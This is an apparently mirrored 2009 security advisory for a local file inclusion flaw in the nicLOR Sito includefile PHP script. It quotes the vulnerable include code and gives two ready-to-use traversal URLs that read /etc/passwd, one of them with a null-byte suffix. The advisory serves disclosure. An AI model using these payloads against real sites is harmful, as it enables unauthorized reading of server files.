nicLOR Sito includefile Local File Inclusion Vulnerabilities

2009.03.01
Credit: StAkeR
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# ------------------------------------------------------------ # Sito includefile in PHP Local File Inclusion Vulnerabilities # ------------------------------------------------------------ # Discovered By StAkeR[at]hotmail[dot]it # Download On http://www.niclor.net/prodotti/include_Sito_PHP/include_Sito_PHP.zip # ----------------------------------------------------------- # File (includefile.php) # Register Globals On 1. <? 2. if (($page != "") or ($page == "home")) { 3. include "pagine/$page_file"; 4. } else { 5. include "pagine/home.php"; 6. } 7. ?> # includefile.php?page=athos&page_file=../../../../../../etc/passwd # File (index.php) # Magic_Quotes_GPC # index.php?id=../../../../../etc/passwd%00


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top